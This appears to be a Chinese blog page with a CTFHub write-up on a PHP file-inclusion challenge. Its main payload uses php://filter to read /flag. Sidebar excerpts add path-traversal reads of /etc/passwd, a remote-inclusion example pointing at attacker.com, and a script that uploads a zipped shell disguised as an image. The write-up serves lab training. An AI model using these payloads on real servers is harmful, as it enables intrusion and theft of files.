CTFHUB-技能树-Web题-RCE（远程代码执行）-文件包含—php://input—读取源代码

最新推荐文章于 2024-07-17 09:45:19 发布

python炒粉

最新推荐文章于 2024-07-17 09:45:19 发布

阅读量385

点赞数 1

分类专栏： CTFHUB解题思路文章标签： php 开发语言 web安全

本文链接：https://blog.youkuaiyun.com/Static______/article/details/140033616

版权

CTFHUB解题思路专栏收录该内容

28 篇文章

订阅专栏

CTFHUB-技能树-Web题-RCE（远程代码执行）-文件包含—php://input—读取源代码

文件包含—php://input—读取源代码

解题方法：

首先观察代码

在这里插入图片描述

file的前六个字母要是php://

而且也没有木马文件可以用，但是它说flag在 /flag当中

那么我们就用到了php://filter伪协议，它用来用于读取源码

php://filter 参数	描述
resource=<要过滤的数据流>	必须项。它指定了你要筛选过滤的数据流。
read=<读链的过滤器>	可选项。可以设定一个或多个过滤器名称，以管道符（*\	*）分隔。
write=<写链的过滤器>	可选项。可以设定一个或多个过滤器名称，以管道符（\	）分隔。
<; 两个链的过滤器>	任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。

比如

php://filter/resource=[文件名]读取文件源码

而它说flag在 /flag当中那么我们直接

?file=php://filter/resource=/flag

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

python炒粉

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

CTFHub-Web-RCE-文件包含

qq_54037445的博客

11-29

1087

文件包含，伪协议

RCE：命令注入过滤空格远程代码执行 php://input 读取源代码

qq_69100706的博客

08-12

985

命令注入是一种常见的技巧，用于实现远程代码执行（RCE）。命令注入发生在Web应用或服务接受用户输入并将其用于执行操作系统命令的场景中，如果用户输入未被妥善清理或验证，攻击者可以注入额外的命令，从而执行任意代码。

参与评论您还未登录，请先登录后发表或查看评论

substr（php函数）

zunguitiancheng的专栏

03-31

560

http://baike.baidu.com/subview/1827482/5080396.htm 1.定义和用法 2.语法 3.参数 1.定义和用法编辑 substr() 函数返回字符串的一部分。如果 start 参数是负数且 length 小于或等于 start，则 length 为 0。 2.语法编辑

CTFHub | php://input

尼泊罗河伯的博客

06-08

2245

简单分析网页显示内容中的源代码，判断如果参数以 php:// 开头，那么执行 include 函数将参数值作为文件包含进来。否则，输出字符串 Hacker!!! 。

CTFHub php://input

人若无名，便可专心练剑

08-16

597

用于读取源码用于执行php代码。

ctfhub php://input 解析

qq_73722777的博客

03-09

361

这里可以看见有一个判断file的前六个字符要与php://相等，于是我们可以利用php：//input语句上传我们的一句话木马使其执行。php://input用于执行php代码。于是我们进行抓包，构建payload。打开网页，可以看见是一串php编码。php://input的功能如下。使用cat语句打开flag文件。得到flag，此题结束。

CTFHUB--RCE--文件包含

qq_75120258的博客

03-02

1087

有时候由于网站功能需求，会让前端用户选择要包含的文件，而开发人员又没有对要包含的文件进行安全考虑，就导致攻击者可以通过修改文件的位置来让后台执行任意文件，从而导致文件包含漏洞。当它与包含函数结合时，php://filter经常会被当作代码呗执行，所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流（I/O streams）data://text/plain 任意代码执行。zlib:// — 压缩流。

CTFHUB-技能树-WEB通关

Alita_lxz的博客

11-11

7862

Web 题目来自ctfhub技能树web部分 Web前置技能操作系统数据库 HTTP协议请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法（也叫动作）来以不同方式操作指定的资源。 1.OPTIONS 　　返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功，则它会在HTTP头中包含一个名为“Allow”的头，值是所支持的方法，如“GET,POST”。　2.HEAD 　　向服务

CTFHub技能树web之RCE（一）

wzhwzh123321的博客

02-18

855

根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码，其中isset函数用于检测是否传入了一个名为cmd的变量的值（是否非空），eval是将一串字符作为php代码执行,$_REQUEST默认包含了。使用hackbar传递POST请求，file为php://input使得POST参数可以作为原始请求的数据，使用bp抓包，即可看到执行POST参数中代码后的内容。substr函数是返回字符串的子串，意思是如果file的前六个字符为php://，那么就会包含file文件。

CTFHub技能树 Web-RCE 详解

weixin_45808483的博客

11-13

2560

RCE简介：初学RCE（远程命令/代码执行漏洞）https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行启动环境分析代码，提示我们将命令赋值给cmd执行我们先查看当前位置的文件，没有什么用 /?cmd=system("ls"); 我们查看根目录文件，发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..

CTFHUB RCE——文件包含

winofkill的博客

12-11

7374

1.文件包含首先我们开启题目看到的是一大串代码我们仔细看一下php代码，重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数意思在string字符串中找find的位置,start是查找的开始位置那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...

ctfhub——php://input

At0m的博客

01-14

7747

首先这道题有一些知识需要了解。参考《php伪协议实现命令执行的七种姿势》《php伪协议总结》首先看一下代码，截取字符串前六个字符需要与 php://相等，也就是file变量的值的前六个字符需要与 php://相等。所以写个题应该是要用到php伪协议。有一个例子看一下 php伪协议该怎么用。 16年华山杯，源码如下： <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($u

文件包含————ctfhub之读取源文件

qq_45655564的博客

05-29

890

php://filter php://filter 读取源代码并进行base64编码输出，不然会直接当做php代码执行就看不到源代码内容了。 PHP.ini： php://filter在双off的情况下也可以正常使用； allow_url_fopen ：off/on allow_url_include：off/on 举例： http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php CT

CTFHub_技能树_Web之RCE——“读取源代码”

Ho1aAs‘s Blog

07-28

1678

文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程查看网页显示的源码这里就不能将指令POST上去了，图中又提示了必须使用php://，FLAG在/flag内因此想到过滤器filter 直接访问?file=php://filter/resource=/flag得到FLAG 完欢迎在评论区留言感谢浏览 ...

ctfhub-读取源代码

At0m的博客

01-15

2220

看源码：试了试 php://input 发现用不了。应该是条件不允许：然后，题目叫做读取源码，所以想到可以使用 php://filter 。然后构造 url http://challenge-948e58fa50c767e6.sandbox.ctfhub.com:10080/?file=php://filter/resource=/flag 一开始就告诉了flag的位置，就可以直接构造url 或者可以用这个，让flag以base64加密的方式输出： ?file=php://filter/rea

CTFHub | 读取源代码

尼泊罗河伯的博客

06-10

2059

打开网页发现源代码，还是和之前一样php:// 。提示说 flag 在代码中，并且在 /flag 文件夹中，题目名字叫读取源代码。

CTFhub-RCE-读取源代码

ssss39的博客

11-13

549

这里的input是不起作用，看大佬说是allow_url_fopen没有开启。直接开始php://filter/resource=/flag,直接梭。那既然要等于php://，就和上题一样，试试php://input。题目要求又必须使用php://。而且flag就在/flag里。

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-过滤cat

Static______的博客

07-17

376

过滤cat就是找个能代替的。

CTFhub php://input

qq_41497476的博客

07-27

4027

这一次相对于远程包含过滤了php://就不能直接利用 input 伪协议完成命令执行了 <?php if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) { include($_GET["file"]); } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?&g

ctfhub 文件包含

最新发布

03-30

### CTFHub 文件包含漏洞利用与防御 #### 背景介绍 文件包含漏洞是一种常见的 Web 应用程序安全漏洞，主要存在于基于 PHP 的服务器端脚本语言中。该漏洞允许攻击者通过指定路径的方式，在目标应用中加载并执行恶意文件的内容。这可能导致远程代码执行 (RCE)，进而使攻击者完全控制受害者的服务器环境。 #### 漏洞原理当应用程序未对用户输入进行严格过滤时，可能会接受来自用户的任意文件名或 URL 并尝试将其作为参数传递给 `include` 或 `require` 函数。如果这些函数被滥用，则可能引入本地文件包含 (LFI, Local File Inclusion) 和远程文件包含 (RFI, Remote File Inclusion) 攻击向量[^3]。 #### 实践案例分析 ##### 1. **本地文件包含** 在某些情况下，开发者会错误地依赖于未经验证的动态变量来决定要包含哪个配置或其他类型的资源文件。例如： ```php <?php $file = $_GET['file']; include($file . '.php'); ?> ``` 上述代码片段存在明显的安全隐患，因为它允许攻击者通过调整 GET 请求中的 `file` 参数注入其他有效载荷。比如访问 `/vulnerable_page.php?file=../../etc/passwd%00` 可能暴露系统密码数据库的信息[^2]。 ##### 2. **远程文件包含** 对于支持 HTTP 协议请求的场景下，默认开启 allow_url_fopen 配置项或者启用了 cURL 扩展库的情况下，可以实现跨站点调用功能。这意味着即使无法直接写入物理磁盘上的新脚本文件，也可以间接引用网络上托管好的 payload 来完成同样的目的。 ```php <?php $url = 'http://attacker.com/malicious_code.txt'; include $url; ?> ``` #### 防御措施建议针对此类威胁采取有效的缓解策略至关重要： - 对所有外部可控的数据实施白名单机制而非黑名单模式； - 禁止使用危险的核心方法如 include(), require() ，改用更安全替代品； - 关闭不必要的特性开关像 php.ini 中设置 disable_functions="passthru,exec,system,chroot,..."; - 定期审查源码质量以及第三方组件安全性评估报告；此外还需注意的是备份管理不当也可能引发类似后果，因为许多 web server 默认不会解析扩展名为 bak 的副本文档，所以它们往往能够绕过常规防护层而被公开下载下来[^4]。最后值得注意的一个技巧是在实际竞赛环境中经常结合文件上传接口来进行综合测试。例如将含有木马指令序列打包成 zip 归档后再伪装成图片形式提交上去之后再设法触发解压过程达到最终效果[^5]. ```python import requests files = {'upload': ('shell_dir_zip.png', open('shell_dir.zip', 'rb'))} response = requests.post(url='target_upload_endpoint', files=files) print(response.text) ``` 以上就是围绕 CTFHub 上有关文件包含漏洞相关内容整理出来的知识点总结及其对应的实际操作指南说明。